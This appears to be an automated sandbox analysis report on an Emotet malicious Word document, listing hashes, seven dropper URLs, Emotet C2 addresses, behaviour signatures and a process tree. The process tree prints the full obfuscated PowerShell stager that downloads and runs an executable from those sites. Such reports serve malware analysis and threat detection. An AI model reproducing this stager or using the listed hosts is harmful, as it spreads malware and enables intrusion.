Analysis

  • max time kernel
    18s
  • max time network
    18s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    28-10-2020 21:03

General

  • Target

    5177894154a2ad0d67c6ea62534a27cdc18b7cfe9c73c8ec6071d72fb8c198a2.doc

  • Size

    224KB

  • MD5

    f87d49246f2654da56ae321bdc8b58d8

  • SHA1

    ef8f3f04dd249fa7dbc737d7d346020ff308f94f

  • SHA256

    5177894154a2ad0d67c6ea62534a27cdc18b7cfe9c73c8ec6071d72fb8c198a2

  • SHA512

    fb02be18f2ea24f0e0a970fd517dddce90c923cbdb3d1e0137031cfe0780741170ff6379dc10c5fd586e3109fa49d95a00a99ef55122b19f1b2ff730675567dc

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://getpranaveda.xyz/wp-admin/yz/

exe.dropper

http://xinhecun.cn/wp-content/VCNbWWDK/

exe.dropper

https://www.apeduti.com.br/wp-includes/XN2wg26v/

exe.dropper

http://heankan.bio/js/Rb/

exe.dropper

https://sheen-vietnam.vn/wp-content/qtg2J6XhZ/

exe.dropper

https://madrushdigital.com/wp-admin/PJi/

exe.dropper

https://lunabituyelik.com/wp-content/fWd0/

Extracted

Family

emotet

Botnet

Epoch3

C2

152.32.75.74:443

91.121.200.35:8080

159.203.16.11:8080

188.226.165.170:8080

172.193.79.237:80

123.216.134.52:80

183.91.3.63:80

139.59.61.215:443

185.80.172.199:80

77.74.78.80:443

153.229.219.1:443

113.203.238.130:80

120.51.34.254:80

116.202.10.123:8080

5.2.246.108:80

50.116.78.109:8080

103.80.51.61:8080

190.55.186.229:80

185.142.236.163:443

223.17.215.76:80

rsa_pubkey.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Emotet Payload 4 IoCs

    Detects Emotet payload in memory.

  • Blacklisted process makes network request 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Drops file in System32 directory 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Delays execution with timeout.exe 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Modifies registry class 280 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5177894154a2ad0d67c6ea62534a27cdc18b7cfe9c73c8ec6071d72fb8c198a2.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:756
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1052
    • C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
      POwersheLL -ENCOD S e t - I T E m     v A R I A B l e : E 3 8 Z 6     (     [ T Y p e ] ( " { 3 } { 0 } { 4 } { 5 } { 1 } { 2 } "   - f   ' t E M ' , ' i r ' , ' E C t o R y ' , ' S y S ' , ' . i o ' , ' . D ' ) )   ; s e T - v A r i a B L E     F E B 8 W     (   [ T y P e ] ( " { 2 } { 5 } { 0 } { 6 } { 3 } { 1 } { 4 } "   - f ' E M . ' , ' E P o I ' , ' S ' , ' . s E r V I c ' , ' N T m a n A g E r ' , ' Y S T ' , ' n e t ' ) )     ; $ X k h 5 m o d = ( ( ' S y p ' + ' z x ' ) + ' w ' + ' r ' ) ; $ U 8 4 t t 7 c = $ U m k h r o s   +   [ c h a r ] ( 6 4 )   +   $ E u _ a 3 r 9 ; $ I l x i y j c = ( ( ' E 3 ' + ' i ' ) + ' n l ' + ' k u ' ) ;   $ E 3 8 z 6 : : " c ` R e ` A T ` E ` D I R E c t O r y " ( $ H O M E   +   ( ( ( ' h 9 L ' + ' D k u 9 ' + ' b ' ) + ( ' 1 _ h ' + ' 9 ' ) + ' L A ' + ' a ' + ( ' p n 1 v v ' + ' h 9 ' + ' L ' ) ) - R E p L a C E ( [ c h A r ] 1 0 4 + [ c h A r ] 5 7 + [ c h A r ] 7 6 ) , [ c h A r ] 9 2 ) ) ; $ O g w o l o a = ( ( ' U y ' + ' x ' ) + ( ' 4 o ' + ' d ' ) + ' _ ' ) ;   (   G c i     V A r I A b L E : f E B 8 W   ) . v a L U E : : " s e ` c u R ` i t ` Y P r O T O C O L "   =   ( ( ' T ' + ' l s 1 ' ) + ' 2 ' ) ; $ T h m l _ j u = ( ( ' G s a z ' + ' g ' ) + ' e ' + ' i ' ) ; $ C 5 2 p r a m   =   ( ( ' A ' + ' v q ' ) + ( ' v 7 t ' + ' 8 9 l ' ) ) ; $ L a w k o c 4 = ( ' Q d ' + ' 0 i ' + ( ' p l ' + ' w ' ) ) ; $ D 4 n l l y p = ( ' U ' + ( ' 4 y ' + ' p ' ) + ( ' n ' + ' i l ' ) ) ; $ Y u l h v p f = $ H O M E + ( ( ( ' g ' + ' U 8 ' ) + ( ' D ' + ' k u ' ) + ( ' 9 ' + ' b 1 _ ' + ' g U 8 ' ) + ' A ' + ( ' a p ' + ' n 1 v ' ) + ( ' v g U ' + ' 8 ' ) ) . " r E P ` L A ` C E " ( ( ' g ' + ' U 8 ' ) , [ s T R I N G ] [ C h A R ] 9 2 ) ) + $ C 5 2 p r a m + ( ( ' . ' + ' e x ' ) + ' e ' ) ; $ A 6 5 u 8 _ e = ( ( ' X ' + ' h s f 9 4 ' ) + ' g ' ) ; $ N u p r r m 8 = . ( ' n e w - ' + ' o b j ' + ' e c t ' )   N E T . w e B c l i E N t ; $ P g a t h r a = ( ( ' h ' + ( ' t t p s ' + ' : ] [ ' ) + '   ' + ( ( ' 1 )   ' + ' j ' ) ) + ( ' j ' + ' k g ' ) + ' S ' + '   [ ' + ( ( ' ]   [ ] w ] [ ' + '   1 ' + ' ) ' + '   ' ) ) + ' j ' + ( ' j k g ' + ' S   ' ) + ( ' [ ]   [ ' + ' ] w ' ) + ( ' g e t p ' + ' r a n a ' + ' v e d ' ) + ( ' a ' + ' . ' + ' x y z ] [   ' ) + ( ( ' 1 ) ' ) ) + ( '   j j ' + ' k ' ) + ' g S ' + '   ' + ' [ ' + ( ' ]   [ ' + ' ] ' ) + ( ' w ' + ' w p - a d m i n ' + ' ] ' ) + ' [ ' + '   ' + ( ( ' 1 )   ' + ' j j ' + ' k g ' ) ) + ' S ' + ( '   [ ' + ' ]   ' + ' [ ] ' ) + ( ' w y z ' + ' ] ' ) + ( ' [ ' + '   1 ' ) + ( ( ' ) ' + '   j ' ) ) + ( ' j ' + ' k g S   [ ] ' ) + ( '   ' + ' [ ] w ' ) + ( ' @ ' + ' h t t ' ) + ( ' p : ' + ' ] ' ) + ( ' [   ' + ' 1 ' ) + ( ( ' ) ' + '   j ' ) ) + ' j k ' + ( ' g S ' + '   [ ]   ' ) + ( ' [ ' + ' ] w ] ' ) + ( ( ' [   1 ) ' + '   ' + ' j j k g ' ) ) + ( ' S   [ ] ' + '   [ ] ' + ' w x i n ' + ' h e c u ' ) + ' n ' + ( ' . c n ] [ ' + '   ' ) + ( ( ' 1 )   j j ' + ' k ' ) ) + ' g S ' + ( '   [ ' + ' ]   [ ' + ' ] ' ) + ( ' w w ' + ' p - c ' ) + ' o n ' + ' t ' + ( ' e ' + ' n t ] [   ' ) + ( ( ' 1 ' + ' )   ' ) ) + ( ' j j k g ' + ' S   ' + ' [ ] ' + '   [ ] w V C ' ) + ( ' N b ' + ' W ' ) + ( ' W D ' + ' K ' ) + ( ' ] [ ' + '   ' ) + ( ( ' 1 ) ' ) ) + ( '   ' + ' j j k g ' ) + ( ' S   [ ] ' + '   ' ) + ( ' [ ] w @ ' + ' h ' ) + ' t ' + ' t ' + ( ' p s ' + ' : ] ' + ' [   1 ' ) + ( ( ' )   j ' + ' j ' ) ) + ( ' k g S ' + '   [ ' + ' ]   ' ) + ( ' [ ' + ' ] w ] [ ' ) + '   1 ' + ( ( ' )   ' ) ) + ( ' j j ' + ' k ' ) + ( ' g S   ' + ' [ ' ) + ( ' ]   ' + ' [ ' ) + ( ' ] ' + ' w w ' + ' w w . ' + ' a p e d ' ) + ( ' u ' + ' t i . ' + ' c o m . b r ' ) + ( ' ] [ ' + '   1 ' ) + ( ( ' )   j j k g S   [ ]   [ ' + ' ] ' + ' w ' ) ) + ' w ' + ( ' p - i n ' + ' c ' ) + ' l ' + ( ' u d e ' + ' s ] [ ' ) + ( ( '   1 )   j ' + ' j k g S   ' + ' [ ' + ' ]   ' ) ) + ' [ ' + ( ( ' ] w X N 2 w ' + ' g ' + ' 2 6 ' + ' v ] [ ' + '   1 )   j j ' + ' k ' + ' g S ' ) ) + ( '   [ ]   [ ' + ' ] w ' + ' @ ' + ' h t ' ) + ( ( ' t ' + ' p : ' + ' ] [   1 )   j ' + ' j ' ) ) + ( ' k ' + ' g S ' ) + ( '   [ ' + ' ]   ' ) + ' [ ] ' + ( ( ' w ] [   1 ' + ' ) ' + '   j j ' + ' k g S ' + '   [ ' ) ) + ( ' ]   [ ' + ' ] w ' ) + ( ' h ' + ' e a n k a n . ' + ' b i o ] [ ' ) + ( ( '   ' + ' 1 )   j j ' + ' k g ' ) ) + ( ' S   ' + ' [ ]   [ ] w ' ) + ' j s ' + ( ' ] ' + ' [   1 ' ) + ( ( ' )   ' + ' j j k ' ) ) + ( ' g S   ' + ' [ ] ' + '   [ ] w ' ) + ( ' R b ] [ ' + '   ' + ' 1 ' ) + ( ( ' ) ' + '   j ' ) ) + ' j ' + ( ' k g S   [ ]   ' + ' [ ] ' + ' w ' ) + ( ' @ h t ' + ' t ' ) + ( ' p s : ' + ' ] [ ' ) + '   ' + ( ( ' 1 ' + ' )   j j k g ' + ' S ' ) ) + ( '   [ ' + ' ]   [ ] ' + ' w ' ) + ( ( ' ] [   1 )   j ' + ' j k ' + ' g S   ' ) ) + ( ' [ ] ' + '   [ ] w s ' + ' h e ' + ' e n ' + ' - v i e t n a m ' + ' . ' + ' v n ' ) + ( ' ] [ ' + '   1 ' ) + ( ( ' )   ' ) ) + ( ' j j ' + ' k ' ) + ( ' g S ' + '   [ ] ' ) + ( '   [ ] w ' + ' w p - ' ) + ( ' c ' + ' o n t e ' ) + ( ' n t ' + ' ] [ ' ) + '   ' + ( ( ' 1 ) ' + '   j j k g S ' ) ) + '   [ ' + ' ]   ' + ( ' [ ] ' + ' w q t g 2 ' + ' J 6 X h ' ) + ( ' Z ] ' + ' [   ' ) + ' 1 ' + ( ( ' )   j j k ' + ' g S   ' ) ) + ( ' [ ' + ' ]   [ ' + ' ] w @ h t t p s ' + ' : ' ) + ( ( ' ] [   1 ' + ' )   j j ' ) ) + ( ' k g ' + ' S ' ) + ( ( '   [ ]   [ ' + ' ] ' + ' w ] [   1 )   j j k ' + ' g ' ) ) + ( ' S   [ ] ' + '   [ ] w m ' + ' a d ' ) + ( ' r u ' + ' s ' + ' h d i g ' ) + ( ' i ' + ' t a l ' ) + ( ' . c ' + ' o m ] ' ) + ( ( ' [   1 ) ' + '   ' + ' j j ' ) ) + ( ' k g S   [ ' + ' ]   [ ] w w ' + ' p ' + ' - a d m i n ' ) + ( ( ' ] [   1 )   j ' + ' j k ' + ' g ' ) ) + ' S ' + '   ' + ( ' [ ] ' + '   ' ) + ' [ ' + ( ' ] w P ' + ' J ' ) + ' i ] ' + ( ' [   ' + ' 1 ' ) + ( ( ' )   j ' + ' j ' ) ) + ' k g ' + ' S   ' + ( ' [ ] ' + '   ' ) + ' [ ' + ( ( ' ] w @ h t t ' + ' p s : ] [   ' + ' 1 )   j j k g S   [ ] ' + '   ' + ' [ ] w ' + ' ] [   1 ) ' ) ) + ( '   j j ' + ' k ' ) + ( ' g S ' + '   [ ] ' ) + ( '   [ ] w ' + ' l ' ) + ' u ' + ( ' n a ' + ' b i t u ' ) + ( ' y ' + ' e l i k . ' + ' c o m ] ' ) + ' [ ' + '   ' + ' 1 ' + ( ( ' )   ' ) ) + ' j ' + ( ' j ' + ' k g S   ' ) + ' [ ] ' + '   ' + ' [ ] ' + ' w ' + ' w ' + ( ' p - ' + ' c o n t ' ) + ( ( ' e ' + ' n t ] [   1 )   j j k ' + ' g S ' ) ) + ( '   [ ' + ' ] ' ) + ( '   [ ] w f ' + ' W ' + ' d 0 ] ' + ' [   1 ' ) + ' ) ' + '   ' + ( ' j j ' + ' k g S ' + '   ' ) + ( ' [ ]   ' + ' [ ] w ' ) ) ) . " r E p L ` A C E " ( ( ( ( ( ' ] [   1 ' + ' )   j ' + ' j k g S ' ) ) + ( '   [ ' + ' ] ' ) + '   ' + ' [ ' + ' ] w ' ) ) , ( [ a r r a y ] ( ' / ' ) , ( ' x ' + ' w e ' ) ) [ 0 ] ) . " s P ` L i T " ( $ Z 4 n d v _ 5   +   $ U 8 4 t t 7 c   +   $ O 7 s v p n w ) ; $ U u h u s c f = ( ( ' R ' + ' q o d f ' ) + ' k 4 ' ) ; f o r e a c h   ( $ M i 5 q _ d o   i n   $ P g a t h r a ) { t r y { $ N u p r r m 8 . " D o ` w n ` L ` O A D f I L e " ( $ M i 5 q _ d o ,   $ Y u l h v p f ) ; $ Q t q u 6 h 5 = ( ' A ' + ' c ' + ( ' _ b ' + ' r t s ' ) ) ; I f   ( ( . ( ' G e ' + ' t - I t e m ' )   $ Y u l h v p f ) . " l E ` N G t h "   - g e   4 0 6 8 3 )   { ( [ w m i c l a s s ] ( ' w ' + ( ' i n 3 2 ' + ' _ ' ) + ( ' P r o c ' + ' e ' + ' s ' ) + ' s ' ) ) . " C R E a ` T e " ( $ Y u l h v p f ) ; $ C m o v w y 8 = ( ' F p ' + ( ' e w ' + ' 1 ' ) + ' w k ' ) ; b r e a k ; $ N 0 8 9 c u v = ( ' F ' + ( ' t q c e ' + ' z ' ) + ' f ' ) } } c a t c h { } } $ W t b 9 o p a = ( ' N ' + ( ' 9 ' + ' x 4 1 p l ' ) ) 
      1⤵
      • Process spawned unexpected child process
      • Blacklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:624
    • C:\Users\Admin\Dku9b1_\Aapn1vv\Avqv7t89l.exe
      C:\Users\Admin\Dku9b1_\Aapn1vv\Avqv7t89l.exe
      1⤵
      • Executes dropped EXE
      • Drops file in System32 directory
      • Suspicious use of WriteProcessMemory
      PID:1708
      • C:\Windows\SysWOW64\WPDSp\timeout.exe
        "C:\Windows\SysWOW64\WPDSp\timeout.exe"
        2⤵
        • Executes dropped EXE
        • Delays execution with timeout.exe
        • Suspicious behavior: EnumeratesProcesses
        PID:896

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\Dku9b1_\Aapn1vv\Avqv7t89l.exe
      MD5

      3251f9c9a23d5979db7894ae67ba43c5

      SHA1

      46bc0900cd636574db1f8e8a4dd83475a130d1a5

      SHA256

      277527cd5795b0441e835de542a3c8a7aa9f6c9a5b134b617d49088c0a0f8e99

      SHA512

      600cb829a8e023499eab355babdff19ef9890d9808c834f895784b3fc175ba920e10a3e811fb839378fbfe8baf36d81d91c49309f17e2b740b915dd731164246

    • C:\Users\Admin\Dku9b1_\Aapn1vv\Avqv7t89l.exe
      MD5

      3251f9c9a23d5979db7894ae67ba43c5

      SHA1

      46bc0900cd636574db1f8e8a4dd83475a130d1a5

      SHA256

      277527cd5795b0441e835de542a3c8a7aa9f6c9a5b134b617d49088c0a0f8e99

      SHA512

      600cb829a8e023499eab355babdff19ef9890d9808c834f895784b3fc175ba920e10a3e811fb839378fbfe8baf36d81d91c49309f17e2b740b915dd731164246

    • C:\Windows\SysWOW64\WPDSp\timeout.exe
      MD5

      3251f9c9a23d5979db7894ae67ba43c5

      SHA1

      46bc0900cd636574db1f8e8a4dd83475a130d1a5

      SHA256

      277527cd5795b0441e835de542a3c8a7aa9f6c9a5b134b617d49088c0a0f8e99

      SHA512

      600cb829a8e023499eab355babdff19ef9890d9808c834f895784b3fc175ba920e10a3e811fb839378fbfe8baf36d81d91c49309f17e2b740b915dd731164246

    • memory/624-8-0x000000001AA70000-0x000000001AA71000-memory.dmp
      Filesize

      4KB

    • memory/624-5-0x000000001AB90000-0x000000001AB91000-memory.dmp
      Filesize

      4KB

    • memory/624-6-0x00000000023D0000-0x00000000023D1000-memory.dmp
      Filesize

      4KB

    • memory/624-7-0x0000000002570000-0x0000000002571000-memory.dmp
      Filesize

      4KB

    • memory/624-9-0x000000001B7C0000-0x000000001B7C1000-memory.dmp
      Filesize

      4KB

    • memory/624-4-0x00000000021F0000-0x00000000021F1000-memory.dmp
      Filesize

      4KB

    • memory/624-3-0x000007FEF5BE0000-0x000007FEF65CC000-memory.dmp
      Filesize

      9.9MB

    • memory/756-1-0x0000000006250000-0x0000000006254000-memory.dmp
      Filesize

      16KB

    • memory/756-0-0x0000000000577000-0x000000000057C000-memory.dmp
      Filesize

      20KB

    • memory/756-2-0x000000000057C000-0x0000000000580000-memory.dmp
      Filesize

      16KB

    • memory/896-18-0x0000000001EE0000-0x0000000001F22000-memory.dmp
      Filesize

      264KB

    • memory/896-17-0x0000000001E60000-0x0000000001EA3000-memory.dmp
      Filesize

      268KB

    • memory/896-15-0x0000000000000000-mapping.dmp
    • memory/1052-10-0x0000000000000000-mapping.dmp
    • memory/1708-13-0x00000000004C0000-0x0000000000502000-memory.dmp
      Filesize

      264KB

    • memory/1708-12-0x0000000000470000-0x00000000004B3000-memory.dmp
      Filesize

      268KB